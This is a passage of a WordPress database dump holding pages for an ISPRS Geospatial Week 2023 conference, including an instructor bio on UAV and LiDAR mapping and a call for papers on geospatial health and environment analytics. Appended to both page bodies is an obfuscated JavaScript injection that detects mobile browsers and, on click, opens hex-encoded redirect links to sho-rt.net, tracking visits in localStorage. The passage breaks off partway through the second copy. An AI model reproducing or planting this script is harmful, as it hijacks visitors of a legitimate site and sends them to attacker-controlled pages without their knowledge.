systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:heading {\"level\":1} --></p>\n<h5><span style=\"font-size: 18pt;\"><strong>Instractor BIO</strong></span></h5>\n<h5 style=\"text-align: justify;\"><span style=\"font-size: 18pt;\"><strong><!-- /wp:heading --> <!-- wp:paragraph --></strong></span></h5>\n<p style=\"text-align: justify;\"><span style=\"text-align: justify; font-size: 12pt;\">Dr. Habib is the Thomas A. Page professor of Civil Engineering at Purdue University and the Co-Director of the Civil Engineering Center for Applications of UAS for a Sustainable Environment (CE-CAUSE). He is also the Associate Director of Purdue University’s Joint Transportation Research Program (JTRP). Dr. Habib’s research interests span the fields of terrestrial and aerial mobile mapping systems. He has been focusing on modeling the perspective geometry of non-traditional imaging scanners, automatic matching and change detection, automatic calibration of low-cost digital cameras, object recognition in imagery and point cloud data, LiDAR mapping, and integrating photogrammetric data with other sensors/datasets (e.g., GNSS/INS, GIS databases, multi- and hyper-spectral sensors, and LiDAR). Over the last seven years, he has been involved in the development, integration, and utilization of wheel-based and UAV-based mobile mapping systems for a wide range of applications in precision agriculture, geometric documentation of transportation corridors, digital forestry, crash scene reconstruction, cultural heritage documentation, environmental management, and infrastructure monitoring.</span></p>\n<p><!-- /wp:paragraph -->[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-04 02:42:23','2023-02-04 02:42:23','',3701,'https://gsw2023.com/?p=3741',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3742,1,'2023-02-04 03:43:19','2023-02-04 03:43:19','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\r\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\r\n<h5><em> </em></h5>\r\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"5px 0px 5px 0px\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\r\n<table width=\"588\">\r\n<tbody>\r\n<tr>\r\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\r\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\r\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\r\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\r\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\r\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em>\r\n\r\n&nbsp;\r\n\r\nThe main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.\r\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\r\n&nbsp;\r\n\r\nI.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.\r\n\r\n&nbsp;\r\n\r\nII.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.\r\n\r\n&nbsp;\r\n\r\nIII.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.\r\n\r\n&nbsp;\r\n\r\nIV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?\r\n\r\n&nbsp;\r\n\r\nV.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes\r\n\r\n&nbsp;\r\n\r\nVI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\r\n<ul>\r\n 	<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\r\n 	<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\r\n</ul>\r\nare the supporting working groups.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u>Scientific Committee:</u></h5>\r\n<ul>\r\n 	<li>Peng Yue, Wuhan University, PR China</li>\r\n 	<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\r\n 	<li>Dr Suchita Gopal, Boston University. USA</li>\r\n 	<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\r\n 	<li>Dr Fazlay Faruq, University of Mississippi USA</li>\r\n 	<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\r\n 	<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\r\n 	<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\r\n 	<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\r\nThe authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 